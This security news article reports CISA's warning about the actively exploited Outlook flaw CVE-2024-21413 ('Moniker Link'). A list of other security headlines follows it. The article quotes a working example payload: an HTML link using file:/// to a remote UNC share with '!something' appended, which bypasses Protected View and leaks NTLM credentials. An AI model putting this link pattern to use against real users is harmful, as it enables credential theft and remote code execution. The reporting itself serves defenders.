
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:/
construct. All the attacker has to do is add a !
character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook gains access to the remote resource \\\
when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.

2025.04.01 — Hackers abuse MU plugins to inject malicious payloads to WordPress
According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected. The technique was first discovered…
Full article →
2025.02.21 — Microsoft fixes vulnerability in Power Pages exploited by cybercriminals
Microsoft patched a severe privilege escalation vulnerability in Power Pages used by hackers as a 0-day. The vulnerability tracked as CVE-2025-24989 (CVSS score 8.2) pertains…
Full article →
2025.04.30 — Coinbase fixes 2FA bug that made customers panic
Cryptocurrency exchange Coinbase has fixed a bug in its Account Activity logs that caused customers to think their credentials were compromised. Earlier this month, BleepingComputer…
Full article →
2025.01.22 — Fake Homebrew Infects macOS and Linux Machines with infostealer
Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.…
Full article →
2025.03.18 — Black Basta ransomware group developed its own automated brute-forcing framework
According to EclecticIQ, Black Basta Ransomware-as-a-Service (RaaS) group has developed its own automated brute-forcing framework dubbed BRUTED. It's used to hack edge network devices…
Full article →
2025.02.20 — Newly-discovered vulnerabilities in OpenSSH open the door to MiTM and DoS attacks
OpenSSH fixed two vulnerabilities that could result in MiTM and denial of service (DoS) attacks. Interestingly, one of these bugs appeared in the code more than 10…
Full article →
2025.04.07 — Critical RCE vulnerability discovered in Apache Parquet
All versions of Apache Parquet up to and including 1.15.0 are affected by a critical remote code execution (RCE) vulnerability whose CVSS score is 10 out…
Full article →
2025.01.28 — J-magic backdoor attacked Juniper Networks devices using 'magic packets'
A massive backdoor attack targeting Juniper routers often used as VPN gateways has been uncovered. The devices were attacked by the J-magic malware that…
Full article →
2025.03.24 — Alexa to stop processing data locally. All voice requests will be sent to Amazon Cloud
Amazon announced that the privacy option allowing users of Echo speakers to avoid sending their voice recordings to the company's cloud will no longer be supported. Effective March…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →